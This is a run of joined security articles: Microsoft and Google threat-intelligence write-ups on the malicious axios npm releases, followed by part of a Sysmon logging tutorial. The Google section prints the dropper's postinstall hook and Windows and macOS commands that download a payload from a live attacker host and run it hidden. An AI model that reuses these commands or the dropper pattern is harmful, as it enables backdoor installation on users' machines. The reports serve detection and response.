| Execution (Windows) | Download and execution of payload 6202033.ps1. | Microsoft Defender for Endpoint: TrojanDownloader:PowerShell/Powdow.VUE!MTB (Blocking); Trojan:Win32/Malgent (Blocking); Behavior:Win32/PSMasquerade.A; Suspicious ASEP via registry key; System executable renamed and launched; Possible initial access from an emerging threat |
| Defense evasion (macOS) | Removal of indicators | Microsoft Defender for Endpoint: Suspicious path deletion |
| Command and control | Use of the following network indicators for C2 communications: C2 domain sfrclak[.]com; C2 IP 142.11.206[.]73; C2 URL hxxp://sfrclak[.]com:8000/6202033 | Microsoft Defender for Endpoint network protection and Microsoft Defender SmartScreen block the malicious network indicators observed in the attack. |
Indicators of compromise
| Indicator | Type | Description |
| --- | --- | --- |
| sfrclak[.]com | C2 domain | Resolves to 142.11.206[.]73. Registrar: NameCheap, Inc |
| 142.11.206[.]73 | C2 IP | Sapphire Sleet C2 IP; port 8000, HTTP |
| hxxp://sfrclak[.]com:8000/6202033 | C2 URL | Static path across all variants |
| %TEMP%\6202033.vbs | Windows VBScript dropper | Created by node setup.js |
| %TEMP%\6202033.ps1 | Windows PowerShell payload | Downloaded from C2, self-deleting. SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c; SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 |
| %PROGRAMDATA%\system.bat | Persistence batch file created by the PowerShell payload | SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd |
| C:\ProgramData\wt.exe | Windows LOLBin | Renamed copy of powershell.exe masquerading as Windows Terminal; used as a PowerShell proxy to run the payload |
| /Library/Caches/com.apple.act.mond | macOS binary | SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a |
| /tmp/ld.py | Linux loader | SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf |
| packages.npm.org/product1 | npm identifier (Windows) | Sent as POST body to C2 |
| packages.npm.org/product0 | npm identifier (macOS) | Sent as POST body to C2 |
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following [advanced hunting](https://learn.microsoft.com/defender-xdr/advanced-hunting-overview) queries to find related activity in their networks:
Installed Node.js packages with malicious versions
DeviceTvmSoftwareInventory
| where (SoftwareName has "axios" and SoftwareVersion in ("1.14.1.0", "0.30.4.0"))
    or (SoftwareName has "plain-crypto-js" and SoftwareVersion == "4.2.1.0")
Detect the RAT dropper and subsequent download and execution
CloudProcessEvents
| where (ProcessCurrentWorkingDirectory endswith '/node_modules/plain-crypto-js'
        and ProcessCommandLine has_all ('plain-crypto-js', 'node setup.js'))
    or ProcessCommandLine has_all ('/tmp/ld.py', 'sfrclak.com:8000')
Connection to known C2
DeviceNetworkEvents
| where Timestamp > ago(2d)
| where RemoteUrl contains "sfrclak.com" or RemoteIP == "142.11.206.73"
| where RemotePort == 8000
Curl execution to download the backdoor
DeviceProcessEvents
| where Timestamp > ago(2d)
| where (FileName =~ "cmd.exe" and ProcessCommandLine has_all ("curl -s -X POST -d", "packages.npm.org", "-w hidden -ep", ".ps1", "& del", ":8000"))
    or (ProcessCommandLine has_all ("curl", "-d packages.npm.org/", "nohup", ".py", ":8000/", "> /dev/null 2>&1") and ProcessCommandLine contains "python")
    or (ProcessCommandLine has_all ("curl", "-d packages.npm.org/", "com.apple.act.mond", "http://", ":8000/", "&> /dev/null"))
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the [Microsoft Sentinel Content Hub](https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy) to have the analytics rule deployed in their Sentinel workspace.
The following queries use [Sentinel Advanced Security Information Model (ASIM) functions](https://learn.microsoft.com/azure/sentinel/normalization) to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces [from GitHub](https://aka.ms/DeployASIM), using an ARM template or manually.
Detect network IP and domain indicators of compromise using ASIM
The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser.
// IP list and domain list - _Im_NetworkSession
// DstDomain holds a bare host name, so the domain IOC is matched without a scheme or port.
let lookback = 30d;
let ioc_ip_addr = dynamic(['142.11.206.73']);
let ioc_domains = dynamic(['sfrclak.com']);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count()
    by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect Web Sessions IP and domain indicators of compromise using ASIM
The following two queries, run separately, check the IP address and domain IOCs across data sources supported by the ASIM web session parser.
// IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(['142.11.206.73']);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count()
    by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

// Domain list - _Im_WebSession
let ioc_domains = dynamic(["http://sfrclak.com:8000", "http://sfrclak.com"]);
_Im_WebSession(url_has_any = ioc_domains)
Microsoft Defender for Cloud
Possibly compromised packages
Microsoft Defender for Cloud customers can use [cloud security explorer](https://learn.microsoft.com/azure/defender-for-cloud/how-to-manage-cloud-security-explorer) to surface possibly compromised software packages: a query that searches for container images containing the axios or plain-crypto-js node packages lists the images that need to be rebuilt from pinned, safe versions.
Threat intelligence reports
Microsoft Defender XDR customers can use the following [threat analytics](https://learn.microsoft.com/defender-xdr/threat-analytics) reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments:
- [Activity profile: Mitigating the Axios npm supply chain compromise](https://security.microsoft.com/threatanalytics3/22b71a55-3c2a-4634-856d-0e937a95834b/overview)
- [Threat profile overview: North Korea state-sponsored activity](https://security.microsoft.com/threatanalytics3/b24de28e-e504-4266-ae56-902d1abed27c/overview?)
- [Technique profile: Malicious npm lifecycle scripts](https://security.microsoft.com/threatanalytics3/abc7c39c-4ca0-4325-bcbf-18a3bc8fab01/overview)
- [Actor profile: Sapphire Sleet](https://security.microsoft.com/threatanalytics3/5ab8c4d1-be7d-4ef9-88b0-6e4f8c356f84/overview)
Microsoft Security Copilot customers can also use the [Microsoft Security Copilot integration](https://learn.microsoft.com/defender/threat-intelligence/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti) in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the [embedded experience](https://learn.microsoft.com/defender/threat-intelligence/using-copilot-threat-intelligence-defender-xdr) in the Microsoft Defender portal to get more information about this threat actor.
Microsoft Security Copilot
[Microsoft Security Copilot](https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-security-copilot) is [embedded in Microsoft Defender](https://learn.microsoft.com/defender-xdr/security-copilot-in-microsoft-365-defender) and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.
Customers can also [deploy AI agents](https://learn.microsoft.com/defender-xdr/security-copilot-agents-defender), including the following [Microsoft Security Copilot agents](https://learn.microsoft.com/copilot/security/agents-overview), to perform security tasks efficiently:
- [Threat Intelligence Briefing agent](https://learn.microsoft.com/defender-xdr/threat-intel-briefing-agent-defender)
- [Phishing Triage agent](https://learn.microsoft.com/defender-xdr/phishing-triage-agent)
- [Threat Hunting agent](https://learn.microsoft.com/defender-xdr/advanced-hunting-security-copilot-threat-hunting-agent)
- [Dynamic Threat Detection agent](https://learn.microsoft.com/defender-xdr/dynamic-threat-detection-agent)
Security Copilot is also available as a [standalone experience](https://learn.microsoft.com/en-us/copilot/security/experiences-security-copilot) where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers [developer scenarios](https://learn.microsoft.com/copilot/security/developer/custom-agent-overview) that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.
Learn more
For the latest security research from the Microsoft Threat Intelligence community, check out the [Microsoft Threat Intelligence Blog](https://aka.ms/threatintelblog).
To get notified about new publications and to join discussions on social media, follow us on [LinkedIn](https://www.linkedin.com/showcase/microsoft-threat-intelligence), [X (formerly Twitter)](https://x.com/MsftSecIntel), and [Bluesky](https://bsky.app/profile/threatintel.microsoft.com).
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the [Microsoft Threat Intelligence podcast](https://thecyberwire.com/podcasts/microsoft-threat-intelligence).
North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack
Google Threat Intelligence Group
Written by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya, Michael Rudden, Mon Liclican
Introduction
Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "[axios](https://www.npmjs.com/package/axios)." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
GTIG attributes this activity to [UNC1069](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of WAVESHAPER.V2, an updated version of [WAVESHAPER](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering) previously used by this threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities.
This blog details the attack lifecycle, from the initial account compromise to the deployment of operating system (OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.
Campaign Overview
On March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the legitimate axios package version 1.14.1. Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled account (ifstap@proton.me).
The threat actor used the postinstall hook within the "package.json" file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an obfuscated JavaScript dropper named "setup.js" in the background.
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"postinstall": "node setup.js"
}
Malware Analysis
The plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL, setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads.
The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs, os, and execSync. After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.
Operating System-Specific Execution Paths
Depending on the identified platform, the dropper executes the following routines.
Windows
The dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate executable to %PROGRAMDATA%\wt.exe, a name borrowed from Windows Terminal. It then downloads a PowerShell script via curl using the POST body packages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\6202033.ps1). The payload is executed through that renamed PowerShell copy with hidden-window (-w hidden) and execution-policy-bypass (-ep bypass) flags, as the VBScript below shows.
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 " & _
    "& %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f", 0, False
macOS
The malware uses bash and curl to download a native Mach-O binary payload to /Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0. It modifies permissions to make the file executable and launches it via zsh in the background.
try
do shell script "
curl -o /Library/Caches/com.apple.act.mond
-d packages.npm.org/product0
-s http://sfrclak.com:8000/6202033
&& chmod 770 /Library/Caches/com.apple.act.mond
&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"
&> /dev/null"
"
end try
do shell script "rm -rf tmp/6202033"
Linux
The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.
Cleanup
Aside from removing downloaded scripts in two execution branches, the script attempts to remove itself and replace the injected package.json with the original one, which was stored as "package.md".
const K = __filename;                 // path of setup.js itself
t.unlink(K, (x => {}))                // delete the loader (t is the dynamically loaded fs module)
t.unlink('package.json', (x => {})), t.rename('package.md', 'package.json', ord)  // drop the injected manifest, restore the original saved as package.md
WAVESHAPER.V2 Backdoor Capabilities
The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a C++ backdoor targeting macOS that collects system information, enumerates directories, or executes additional payloads, and that connects to the C2 provided via command-line arguments. Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent:
mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)
Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The backdoor supports multiple commands, outlined in Table 1.
On Windows, persistence is achieved by creating a hidden batch file (%PROGRAMDATA%\system.bat) and adding a new entry named MicrosoftUpdate to HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to launch it at logon.
WAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:
- Reconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS version, and detailed running process lists.
- Command Execution: Supports multiple execution methods, including in-memory Portable Executable (PE) injection and arbitrary shell commands. The shell execution command expects a script and script parameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a script is provided, it is either Base64-encoded or placed into a file depending on its size.
- File System Enumeration: Returns detailed metadata for requested target directories by continuously recursing through the file system.
Attribution
GTIG attributes this activity to [UNC1069](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a financially motivated North Korea-nexus threat actor active since 2018. Analysis of the C2 infrastructure (sfrclak[.]com resolving to 142.11.206.73) revealed connections from a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the same ASN has been historically linked to UNC1069 operations.
Furthermore, WAVESHAPER.V2 is a direct evolution of [WAVESHAPER](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a macOS and Linux backdoor previously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol and employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system information, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL dynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent string, and deploy secondary payloads to identical temporary directories (e.g., /Library/Caches/com.apple.act.mond).
Outlook and Implications
The impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages rely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open source supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub Actions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the SANDCLOCK credential stealer and facilitate follow-on extortion operations.
Hundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This could enable further software supply chain attacks, software as a service (SaaS) environment compromises (leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over the near term.
Supply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and enterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the trust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close attention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact, remediate compromised systems, and harden environments against future attacks.
Remediation
GTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority should be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any potentially exposed secrets or credentials. Following initial containment, organizations must implement long-term hardening through strict version pinning and enhanced supply-chain monitoring.
- Version Control: Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM repositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).
- Dependency Pinning: Pin axios to a known safe version in package.json (an exact version, with no ^ or ~ prefix), commit the resulting package-lock.json, and install with npm ci so the lockfile is honored and accidental upgrades are prevented.
- Malicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions 4.2.0 or 4.2.1). Use tools like [Wiz](https://wiz.io) or [Open Source Insights](https://deps.dev/) for deeper dependency auditing.
- Pipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not pulling "latest" versions before redeploying with pinned, safe versions.
- Incident Response: If plain-crypto-js is detected, assume the host environment is compromised. Revert the environment to a known-good state and rotate all credentials or secrets present on that machine.
- Network Defense: Block all traffic to sfrclak[.]com and the command & control IP 142.11.206.73. Monitor and alert on any endpoint communication attempts to this domain.
- Cache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers to prevent re-infection during subsequent installs.
- Endpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes spawning from Node.js applications that match known Indicators of Compromise (IOCs).
- Credential Management: Rotate all tokens and API keys used by applications confirmed to have run indicators of compromise (IOCs).
- Developer Sandboxing & Secret Vaulting: Isolate development environments in containers or sandboxes to restrict host filesystem access, and migrate plaintext secrets to the OS keychain using [aws-vault](https://github.com/ByteNess/aws-vault?tab=readme-ov-file). This ensures compromised packages cannot programmatically scrape credentials or execute malicious scripts directly on the host machine.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free [GTI Collection](https://www.virustotal.com/gui/collection/c5adea0fa8aac14e6aabd8d3d4a1d19e4cd0eb76e679f2e9d3fed2a3170c09bb/summary) for registered users.
Network Indicators
File Indicators
YARA Rules
These rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts for retrospective hunting and validation.
```yara
rule G_Backdoor_WAVESHAPER.V2_PS_1
{
    meta:
        description = "Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encoded JSON beacons and supports PE injection and script execution"
        author = "GTIG"
        md5 = "04e3073b3cd5c5bfcde6f575ecf6e8c1"
        date_created = "2026/03/31"
        date_modified = "2026/03/31"
        rev = 1
        platforms = "Windows"
        family = "WAVESHAPER.V2"
    strings:
        $ss1 = "packages.npm.org/product1" ascii wide nocase
        $ss2 = "Extension.SubRoutine" ascii wide nocase
        $ss3 = "rsp_peinject" ascii wide nocase
        $ss4 = "rsp_runscript" ascii wide nocase
        $ss5 = "rsp_rundir" ascii wide nocase
        $ss6 = "Init-Dir-Info" ascii wide nocase
        $ss7 = "Do-Action-Ijt" ascii wide nocase
        $ss8 = "Do-Action-Scpt" ascii wide nocase
    condition:
        uint16(0) != 0x5A4D and filesize < 100KB and 5 of ($ss*)
}

rule G_Hunting_Downloader_suspected_UNC1069_PS_1
{
    meta:
        description = "Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply chain attack. Associated to WAVESHAPER.V2"
        author = "GTIG"
        md5 = "089e2872016f75a5223b5e02c184dfec"
        date_created = "2026/03/31"
        date_modified = "2026/03/31"
        rev = 1
        platforms = "Windows"
    strings:
        $ss1 = "start /min powershell -w h" ascii wide nocase
        $ss2 = "[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString" ascii wide nocase
        $ss3 = "Invoke-WebRequest -UseBasicParsing" ascii wide nocase
        $ss4 = "-Method POST -Body" ascii wide nocase
        $ss5 = "packages.npm.org/product1" ascii wide nocase
    condition:
        uint16(0) != 0x5A4D and filesize < 5KB and all of them
}

rule G_Hunting_Downloader_SILKBELL_1
{
    meta:
        description = "Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfuscation and custom XOR. Associated with WAVESHAPER.V2"
        author = "GTIG"
        md5 = "7658962ae060a222c0058cd4e979bfa1"
        date_created = "2026/03/31"
        date_modified = "2026/03/31"
        rev = 1
        platforms = "Any"
    strings:
        $ss1 = "OrDeR_7077" ascii wide fullword
        $ss2 = "String.fromCharCode(S^a^333)" ascii wide
        $ss3 = "\"TE9DQUw^\".replaceAll(\"^\",\"=\")" ascii wide
        $ss4 = "\"UFM_\".replaceAll(\"_\",\"=\")" ascii wide
        $ss5 = "\"U0NSXw--\".replaceAll(\"-\",\"=\")" ascii wide
        $ss6 = "\"UFNfQg--\".replaceAll(\"-\",\"=\")" ascii wide
        $ss7 = "\"d2hlcmUgcG93ZXJzaGVsbA((\".replaceAll(\"(\",\"=\")" ascii wide
    condition:
        uint16(0) != 0x5A4D and filesize < 100KB and all of them
}
```
Google Security Operations (SecOps)
Google Security Operations (SecOps) customers have access to the following broad category rules and more under the Mandiant Intel Emerging Threats rule pack.
- Curl Writing Apple System File to Staging Directory
- Node Spawning Nohup Osascript
- Node Spawning Windows Script Host With Delete Command
- Windows Script Host Spawning Shell With Curl
- Windows Terminal In Suspicious Staging Directory
Wiz
Wiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are impacted. For more information refer to Wiz’s blog post, [Axios NPM Distribution Compromised in Supply Chain Attack](https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack).
Building a Detection Foundation: Part 4 - Sysmon
Filling the Gaps Native Logging Can't
At this point in our series, we have Windows Security events capturing logon sessions and process creation, and PowerShell logging capturing script execution. That's a solid foundation. But if you've worked Incident Response, you've hit the walls of native logging:
- "We know PowerShell ran, but what did it connect to?"
- "Something modified this registry key, but we don't know which process."
- "A malicious DLL was loaded—when? By what?"
This is where Sysmon enters the picture. Sysmon, a free Windows system service and driver from Microsoft [Sysinternals](https://learn.microsoft.com/en-us/sysinternals/) that monitors and logs system activity to the Windows event log, is soon to be included in the latest versions of Windows Server and Windows 11. It's not a replacement for native logging—it's a complement that provides telemetry Windows simply doesn't offer natively.
I do have a small bias since I have been writing about the tool since it came out, given multiple training classes on it, and wrote most of the [Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide), but I do see where it falls short and will do my best to cover some of the basics. Do check the [resources](#Resources) at the end of this blog to go deeper on how to leverage the tool.
What Sysmon Provides
Looking back at our [MITRE ATT&CK](https://attack.mitre.org/) data source coverage, here's where Sysmon fills critical gaps:
| Data Component | Technique Coverage | Sysmon Event |
|---|---|---|
| Process Creation | 452 | Event 1 (enhanced parent info, hashes) |
| Network Connection Creation | 151 | Event 3 |
| Module Load | 109 | Event 7 |
| Windows Registry Key Modification | 86 | Events 12, 13, 14 |
| Process Access | 77 | Event 10 |
| File Creation | 174 | Event 11 |
| Driver Load | 14 | Event 6 |
| WMI Operations | 7 | Events 19, 20, 21 |
| Named Pipe | 4 | Events 17, 18 |
| DNS Queries | — | Event 22 |
Let me walk through the Sysmon events you should care about and why.
Essential Sysmon Events
Event 1: Process Creation
Yes, we have Event ID 4688 from native logging. So why use Sysmon Event 1?
What Sysmon adds:
- File hashes (MD5, SHA1, SHA256) of the executable
- More reliable parent process information
- Parent command line
- Integrity level
- More consistent formatting
Detection value:
- Hash lookups for known-bad binaries
- Detecting renamed legitimate tools (hash matches, name doesn't)
- Process tree reconstruction
Event 3: Network Connection
This is huge. Native Windows logging does not provide a reliable way to track which process connected to which IP address. Sysmon Event 3 captures:
- Source IP address and port
- Destination IP address and port
- Protocol
- The process that initiated the connection
- User context
Why this matters: You see PowerShell execute. It runs a download cradle. Event 3 shows you powershell.exe connected to 192.168.1.100:443. Now you have an IOC to hunt for across other systems and network logs.
What to prioritize:
When configuring Event 3, I recommend focusing on two categories:
1. C2 Channels: Ports commonly used for C2 traffic
- SSH (22) - Often used for encrypted C2
- HTTP (80) and HTTPS (443) - The most common C2 channels
- DNS (53) - DNS tunneling and C2 over DNS
2. Lateral Movement/Remote Management: Ports that indicate system-to-system access
- RDP (3389)
- WinRM (5985, 5986)
- SSH (22)
- SMB (445)
- Telnet (23)
- Common Remote Monitoring and Management (RMM) tools (varies by vendor—ScreenConnect, AnyDesk, TeamViewer, etc.)
The HTTPS exclusion problem:
Here's a challenge: every software vendor wants telemetry these days. Your environment is full of legitimate HTTPS traffic from browsers, update services, security tools, and business applications. If you log all port 443 traffic, you'll drown in noise.
The solution is compound exclusion rules. Don't exclude based on a single field—attackers can rename their tools. Instead, build exclusions that require multiple conditions to match:
- Image (full path) AND ParentImage (full path)
- Or Image AND User context
For example, don't just exclude chrome.exe. Exclude C:\Program Files\Google\Chrome\Application\chrome.exe when the parent is C:\Program Files\Google\Chrome\Application\chrome.exe (Chrome spawns child processes). An attacker who names their beacon chrome.exe and drops it in C:\Users\Public\ won't match your exclusion.
This approach takes more effort upfront but dramatically reduces your exposure to simple evasion techniques.
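A Sysmon configuration fragment for Event 3 built along these lines, as an added example rather than the author's config: it includes the C2 and remote-management ports listed above and excludes Chrome only when the full image path, the user context and the port all match. The schemaversion, the Chrome install path and the `CORP\` domain are assumptions; this uses the Image AND User form, and whether ParentImage can be used in a NetworkConnect rule depends on the schema of your installed Sysmon (`sysmon64.exe -s` prints it).

```xml
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <!-- Event 3: log connections to the C2 and lateral-movement /
         remote-management ports from the two lists above. -->
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <DestinationPort name="C2: SSH" condition="is">22</DestinationPort>
        <DestinationPort name="C2: HTTP" condition="is">80</DestinationPort>
        <DestinationPort name="C2: HTTPS" condition="is">443</DestinationPort>
        <DestinationPort name="C2: DNS" condition="is">53</DestinationPort>
        <DestinationPort name="Lateral: RDP" condition="is">3389</DestinationPort>
        <DestinationPort name="Lateral: WinRM" condition="is">5985</DestinationPort>
        <DestinationPort name="Lateral: WinRM over TLS" condition="is">5986</DestinationPort>
        <DestinationPort name="Lateral: SMB" condition="is">445</DestinationPort>
        <DestinationPort name="Lateral: Telnet" condition="is">23</DestinationPort>
      </NetworkConnect>
    </RuleGroup>

    <!-- Exclusions take precedence over includes, so each one must be narrow.
         groupRelation="and" makes every field in the Rule a requirement:
         the exact installed path, a domain user (CORP\ is a placeholder),
         and port 443. A beacon renamed chrome.exe under C:\Users\Public\
         fails the Image test and is still logged; so is the real Chrome
         binary running as SYSTEM, which is worth a look in its own right. -->
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="exclude">
        <Rule groupRelation="and" name="Chrome HTTPS, interactive user">
          <Image condition="is">C:\Program Files\Google\Chrome\Application\chrome.exe</Image>
          <User condition="begin with">CORP\</User>
          <DestinationPort condition="is">443</DestinationPort>
        </Rule>
        <!-- Weak form, kept commented out for contrast: matching on the
             image name alone also suppresses any binary called chrome.exe.
        <Image condition="image">chrome.exe</Image>
        -->
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```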
Event 6: Driver Load
Attackers load malicious drivers for kernel-level access, rootkit functionality, or to disable security tools. Event 6 captures:
- Driver path
- Hash
- Signature status
Why this matters: Recall the vulnerable driver attacks used to blind EDR? Event 6 would show that driver loading, giving you a fighting chance to detect it.
Event 7: Image Load (DLL)
This logs when a module (DLL) is loaded into a process and is critical for detecting:
- DLL hijacking
- Side-loading attacks
- Reflective DLL injection (in some cases)
Configuration consideration: This event is noisy. You'll want to filter aggressively—focus on non-standard paths, unsigned DLLs, specific DLLs that are known to provide attackers capabilities they need, and specific high-risk processes.
Event 10: Process Access
This fires when a process opens a handle to another process. This is your primary indicator for credential extraction techniques that access LSASS.
Why this matters: Mimikatz and similar tools need to open a handle to lsass.exe with specific access rights. Event 10 captures this.
What to watch for:
- Any process accessing LSASS with access mask 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION). Pay special attention to access masks 0x1F1FFF or 0x1FFFFF, as these are the highest permission level and mean memory is being extracted from the process.
- Non-standard processes accessing LSASS at all
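An Event 10 fragment that turns the watch list above into rules, added here as an example and not taken from the author's config. The named compound rules tag the three access masks so the matching rule name travels with the event to the SIEM, a catch-all logs every other handle to LSASS, and the exclusion list (svchost.exe and WmiPrvSE.exe) is an assumed baseline to be replaced with what your own hosts show. The schemaversion is also an assumption.

```xml
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <!-- Event 10: handles opened to lsass.exe. Each compound rule requires the
         LSASS target AND one of the access masks discussed above; the matching
         rule name is written to the event's RuleName field for SIEM triage. -->
    <RuleGroup name="" groupRelation="or">
      <ProcessAccess onmatch="include">
        <Rule groupRelation="and" name="LSASS read access (0x1010)">
          <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
          <GrantedAccess condition="is">0x1010</GrantedAccess>
        </Rule>
        <Rule groupRelation="and" name="LSASS full access (0x1F1FFF)">
          <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
          <GrantedAccess condition="is">0x1F1FFF</GrantedAccess>
        </Rule>
        <Rule groupRelation="and" name="LSASS full access (0x1FFFFF)">
          <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
          <GrantedAccess condition="is">0x1FFFFF</GrantedAccess>
        </Rule>
        <!-- "Non-standard processes accessing LSASS at all": log every other
             accessor too; the exclusions below carve out the known-good ones. -->
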